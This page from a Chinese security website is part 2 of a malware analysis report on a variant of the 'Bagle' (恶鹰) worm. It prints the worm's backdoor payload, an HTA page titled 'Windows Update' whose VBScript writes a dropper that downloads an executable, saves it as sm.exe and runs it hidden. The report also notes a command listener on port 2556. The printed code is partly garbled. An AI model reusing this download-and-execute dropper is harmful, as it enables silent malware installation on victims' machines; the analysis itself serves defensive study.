Your Ad Here
首页 | 编程语言 | 网站建设 | 游戏天堂 | 冲浪宝典 | 网络安全 | 操作系统 | 软件时空 | 硬件指南 | 病毒相关 | IT 认证
软讯网络 > 网络安全 > 黑客技术 > 蠕虫病毒“恶鹰变种”分析报告(2)
【标  题】:蠕虫病毒“恶鹰变种”分析报告(2)
【关键字】:病毒,蠕虫
【来  源】:网络

蠕虫病毒“恶鹰变种”分析报告(2)

Your Ad Here 蠕虫病毒“恶鹰变种”分析报告(2)

后门线程:

  病毒监听81端口接,向联接上来的客户端发送以下脚本。

<HTML>
<HEAD>
<TITLE>Windows Update</TITLE>
<HTA:APPLICATION ID="Q" APPLICATIONNAME="Q" BORDER="none" BO''RDERSTYLE="normal" CAPTION="no" ICON="" CONTEXTMENU="no" MAX'
. IMIZEBUTTON="no" MINIMIZEBUTTON="no" SHOWINTASKBAR="no" SING'
. LEINSTANCE="no" SYSMENU="no" VERSION="1.0" WINDOWSTATE="minimize"/>
<SCRIPT LANGUAGE="VBScript">
MyFile = "q.vbs"'
drte52f = "ileSyst"'
Set FSO = CreateObject("Scripting.F"+drte52f+"emObject")',
Set TSO = FSO.CreateTextFile(MyFile, True)',
TSO.write "Dim BD" & vbcrlf'
TSO.write "Dim xml" & vbcrlf'
TSO.write "f5j545i = ""MLH""" & vbcrlf',
TSO.write "Set xml = CreateObject(""Microsoft.X""+f5j545i+""'
TTP"")" & vbcrlf
TSO.write "xml.Open ""GET"", ""',0
False" & vbcrlf
TSO.write "xml.Send" & vbcrlf'
TSO.write "C=C=C=C" & vbcrlf'
TSO.write "BD = xml.ResponseBody" & vbcrlf',
TSO.write "C=C=C=C" & vbcrlf'
TSO.write "Const adTypeBinary = 1" & vbcrlf'
TSO.write "Const adSaveCreateOverWrite = 2" & vbcrlf'
TSO.write "C=C=C=C" & vbcrlf'
TSO.write "Dim BinaryStream" & vbcrlf
TSO.write "C=C=C=C" & vbcrlf'
TSO.write "Set BinaryStream = CreateObject(""ADODB.Stream"")'& vbcrlf'
TSO.write "BinaryStream.Type = adTypeBinary" & vbcrlf'
TSO.write "A=A=A=A" & vbcrlf'
TSO.write "BinaryStream.Open" & vbcrlf'
TSO.write "BinaryStream.Write BD" & vbcrlf'
TSO.write "b=b=b=b" & vbcrlf'
TSO.write "BinaryStream.SaveToFile ""sm.exe"", adSaveCreateOverWrite" & vbcrlf'
TSO.write "Dim WshShell" & vbcrlf'
TSO.write "Set WshShell = CreateObject(""WScript.Shell"")" &vbcrlf'
TSO.write "WshShell.Run ""sm.exe"", 0, false" & vbcrlf
TSO.close
Set TSO = Nothing'
Set FSO = Nothing
Dim WshShell
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "q.vbs", 0, false',
</SCRIPT>'
<script>window.close()</script>
</HEAD>
</HTML>

  病毒监听:

  监听2556端口接受一些客户端传来的特定命令。

  注:病毒将在2005年12月31日以后失去传播能力,病毒将自我删除。(待续)

蠕虫病毒“恶鹰变种”分析报告(3):【上一篇】
蠕虫病毒“恶鹰变种”分析报告(1):【下一篇】
【相关文章】
  • 蠕虫病毒“恶鹰变种”分析报告(3)
  • “莫国防”变种病毒分析报告
  • 2002年毒性最大的五大网络病毒
  • 恶性蠕虫“恶鹰”变种分析报告(1)
  • 恶性蠕虫“恶鹰”变种分析报告(2)
  • 恶性蠕虫“恶鹰”变种分析报告(3)
  • “网络天空”蠕虫病毒分析报告(1)
  • “网络天空”蠕虫病毒分析报告(2)
  • “QQ病毒”查杀完全手册(2)
  • “QQ病毒”查杀完全手册(3)
  • 【随机文章】
  • 悬而未决:WORD2000的菜单栏工具栏竟然全不见了!
  • qmail安装文档
  • set_pte()
  • 轻松打造Flash帧速率测试器
  • 在Debia上安装 Oracle 10gR2 RAC: 设置虚拟机的网络及共享磁盘
  • 在linux下运行dos软件
  • 包封料、绝缘粉末、绝缘树脂、绝缘环氧粉末包封料、环氧粉末选购指南
  • 1991年程序员考试试题
  • Windows XP 中夏令时、远程计算机和系统时钟调整
  • 在Flash MX中实现设为首页和加入收藏夹
  • 【相关评论】
    没有相关评论
    【发表评论】
    姓名:
    邮件:
    随机码*
    评论*
          
    |  首 页  |  版权声明  |  联系我们   |  网站地图  |
    CopyRight © 2004-2007 bbb软讯网络 All Rigths Reserved.